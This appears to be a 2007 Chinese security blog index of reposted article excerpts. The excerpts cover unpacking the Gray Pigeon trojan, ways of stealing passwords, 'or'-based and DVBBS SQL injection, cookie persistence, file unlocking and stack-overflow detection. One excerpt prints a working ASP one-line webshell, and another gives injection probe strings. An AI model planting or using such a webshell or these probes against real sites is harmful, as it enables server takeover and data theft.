【文章标题】: 小菜T4nk手把手教你手脱灰鸽子2007 Beta 2最新版
【文章作者】: T4nk
【作者邮箱】: [email protected]
【作者主页】: http://www.upx.com.cn
【软件名称】: 灰鸽子2007 Beta 2
【软件大小】: 1.71M
【加壳方式】: ASProtect 1.22 – 1.23 Beta 21 -> Alexey Solodovnikov
【保护方式】: ASProtect
【编写语言】: Delphi
【使用工具】: peid Od importrec
【操作平台】: Windows Xp Sp2
【软件介绍】: 国内知名的远程管理软件(比较有名的国内木马)
【作者声明】: 只是感兴趣,没有其他目的。失误之处敬请诸位大侠赐教!
先用peid查下壳ASProtect 阅读全文 »
Tags: 灰鸽子
Author: czy
Date: 2007-08-09 (pub)
http://www.ph4nt0m.org
*目前的各类密码记录技术*
目前各类密码记录程序多如牛毛,但实现原理无非有以下六个:
一:调用CreateRemoteThread函数远程DLL或代码注入.
二:调用SetWindowsHookEx安装键盘钩子记录按键,或是键盘驱动记录按键.(注五)
三:伪造登陆界面.
四:登录信息在网络传输过程中被嗅探.
五:分析目标程序流层,文件补丁技术(注一).
六:分析目标程序流层,搜索并读取存放在内存中(比如:全局变量)的密码.
由于后四个技术都要对目标程序进行专门的分析所以更多的用在专用游戏盗号程序中.这样目前通用的获取目标主机各类程序登录密码的技术还是紧紧局限于前两个.
阅读全文 »
来源:绝对零度blog
记得一年前火狐有一位朋友问,如果一个站过滤了and和"'"的话,改怎么注入啊?当时我随口说了句"or注入",后来又一次看贴的时候,看到他问我该怎么利用呢?我就写了几个简单的语句给他,叫他自己变换,他很感激我,还说网上没有这种方法。我到网上查了查,还真没有or注入专题呢(or 1=1除外),呵呵,所以,一年后的今天,就有了这篇文章。
我们用雷霆购物系统做or注入演示。我们先用or 1=1和or 1=2来测试是否存在注入点,我们先来看正常页面的面貌。我们现在用or 1=1测试是否存在注入漏洞。返回的是另外一个页面,我们再来测试or 1=2。返回的是正常的页面,说明猜测正确的时候是错误,猜测错误的时候是正常,这就是真正的"假是真时真是假",比lake2大哥哥的IP欺骗更经典哦,呵呵。
阅读全文 »
Tags: SQL Injection,
SQL注入
来源:amxku's blog
所谓的 session cookie, 就是站台在你登录成功后,送上一个 cookie,表示你已经通过验证,但与一般cookie不同的是,他并不会存在你的硬盘上,也就是说:在你离开浏览器之后,就会消失,也就是意味:下次你重开浏览器,再进此站,此 cookie 已经不见了。
那么,要怎么让这个 cookie 永远有效呢?说永远太久了
我们就来个 50 年不变吧…
以下是代码片段:
阅读全文 »
Tags: Cookie,
Session
鬼仔注:刚由黑板提醒,此漏洞已在上月修补过。
来源:Allyesno's Blog
作者:Allyesno[AT]77169.org
我这边已经假设好了一个DVBBS8 SQL:
我们先来注册一个用户,随便找个帖子。刚才弄坏了。。。。
我们来重新发个帖子。点发表评论,这里来抓包
阅读全文 »
Tags: Dvbbs,
漏洞
来源:安全焦点
作者:cbns888
电邮:[email protected]
一.概述:
如果一个病毒文件被植入正在运行的进程中,我们想要清除它时系统总会提供无法删除;有时编辑文件的进程被意外中止而文件句柄没有正确释放,导致此文件无法进行改写操作。现在我们会使用Unlocker之类的小工具去解锁,但在编写程序的可能会需要把这些功能包含在自己的代码中,本文就是自己写代码实现”如何关闭已经被加载的DLL或是正在使用的文件”功能,使用文章中的方法能很方便的完成文件解锁功能。
按最初的想法准备在ring0中完成这些功能,但在查找资料的过程中发现既然我们能在ring3中做,为什么不让这些方法更通用一些呢。其实功能实现并不难,主要是前期从哪里入手比较麻烦。
我们知道无论是动态库或是文件在加载到进程中时, 阅读全文 »
Tags: ring3
鬼仔注:gyzy自己把最后一张图都忘了,文章中没有贴出来,我从PDF中提取了图三出来,加了上去。
Author:gyzy
Email:[email protected]
Homepage:http://www.gyzy.org
Date:2007-08-08
带图片的PDF版本及随文工程可在 http://www.gyzy.org/down/finger.rar 下载
一. 现有的检测栈溢出的模式
二. 现有检测体系存在的不足
三. 针对引擎要做的改进
四. 关于未来
引言
当前主动防御等的概念逐渐进入人们视野,国外主流的杀毒软件都有栈溢出的检测模块,尽管相对传统的木马和病毒来说,缓冲区溢出仍占攻击的很小一部分,但是基于传统的“木桶理论”,安全是一个整体,威胁还是无处不在。
阅读全文 »
软件作者:kj021320
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
注意:本文章首发http://blog.csdn.net/kj021320/archive/2007/08/04/1726442.aspx,后由原创作者kj021320友情提交到邪恶八进制信息安全团队论坛。
首先回顾一下以前ASP一句话的经典木马吧!
<%if request("nonamed")<>"" then execute request("nonamed")%>
VBS中execute就是动态运行指定的代码而JSCRIPT中也同样有eval函数可以实现,也就是说ASP一句话木马也有个版本是采用JSCRIPT的 eval的!网上也有例子我就不多说了!…..
然后解析语言终究发展成为中间代码例如java .net 动态执行也就不存在了!
阅读全文 »
Tags: ASPX